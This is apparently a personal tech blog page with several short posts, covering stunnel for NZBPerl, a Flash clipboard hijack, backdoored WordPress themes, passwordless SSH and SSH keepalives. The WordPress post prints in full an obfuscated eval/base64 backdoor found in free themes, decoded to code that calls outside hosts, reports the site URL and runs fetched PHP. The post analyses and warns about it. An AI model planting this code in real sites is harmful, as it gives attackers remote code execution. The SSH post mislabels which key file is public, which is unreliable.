header

NZBPerl and SSL (using stunnel4)

SSL is a fairly recent addition (seemingly) to the usenet client arena, most clients that support it have only added support within the past two years or so. I’m giving NZBPerl a try, mostly because it’s the only one that fits in natively with Torrentflux b4rt. NZBPerl “technically” supports ssl (with the –ssl switch), but in practice it hangs and never really accomplishes its tasks. It’s all over teh interwebs that NZBPerl doesn’t quite work with ssl, but since the author last released in late 2006, it’s not likely to see an update to properly support ssl.

I spent about 4 hours over the weekend playing around with the source to no avail. If I could find a working patch, I would have applied it and submitted it upstream… that would have been ideal of course.

So I instead used the haxy method, wrap the nonssl nntp requests in stunnel, therefore effectively accomplishing the same goal. Here is the setup I used in Ubuntu:

# superuser assumed
apt-get install stunnel4
vim /etc/stunnel/snntp.conf
# put in the following
foreground=yes
client=yes
[nntp]
accept  = 127.0.0.1:119
connect = SECURE_NEWS_SERVER:563
# /put
stunnel4 /etc/stunnel/snttp.conf 1>>/var/log/stunnel.log 2>&1 &

Then in Torrentflux-b4rt, enable NZBPerl (ensuring prereqs match first), set the server hostname to 127.0.0.1, add your username/password to the list, and give it a try. Of course inspect /var/log/stunnel.log if there are any issues. Worked like a charm for me.

Comments (0)

Flash Clipboard Hijack

Apparently there are some malicious Adobe Flash ads out there that can hijack your browser clipboard. The issue affects Linux, Windows and OS X; Firefox, Safari and Internet Explorer — basically any client that relies on the Adobe Flash plugin. If you don’t believe it, check out the proof of concept (you have been warned). That particular site hijacks your clipboard with “http://evil.com”.

I saw this today when my browser (Firefox 3.0.1 — latest on Windows XP — patched) wouldn’t let me copy and paste text. It would be the same potentially malware [http://windowsxp-privacy.com/?id=…] result every time I CTRL-V’d. After some digging around, I realized that it was localized to my browser (I thought for sure it was a system issue at first), so to fix the issue, I closed the browser and re-opened. The issue was resolved.

Considering the manual effort required to update Flash, combined with the fact that I usually only install Flash when a computer is built and never update it, this leads me to believe this issue is widespread and not going to be fixed anytime soon. It’s a minor annoyance, but still, a pretty neat little exploit.

Comments (0)

WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBRE
Q3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJ
FIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3M
EQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5Qzg
wRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSA
id3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5
MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0
RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYx
MkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVu
Y29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkU
jNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTN
FRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQ
TgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3
d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2Ln
BocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hU
VFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQ
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
 $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
 $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
 @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  $R3E33E017CD76B9B7E6C7364FB91E2E90 =
 @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } 
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php

eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
')));

Which doesn’t turn out to be as bad, only few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get WordPress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.

Comments (3)

How to SSH w/o a password on FreeBSD

Adapted from a Berkeley Guide, if you want to be able to SSH from unix or linux boxes (e.g. FreeBSD) without having to repeatedly put in the password, this guide will show you how to do that.

First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passkey. This creates a file containing the public key (id_rsa) and a file containing the private key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 authorized_keys2

That’s it! Now connection from the client to the server with this command

ssh server

If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server

If that works, add or create the file and insert these two lines to ~/.ssh/config

Host server
{tab}IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.

Comments (3)

FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.


cd /usr/ports/sysutils/spinner/
make install clean
spinner

It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great! 🙂

Comments (1)


blogtimes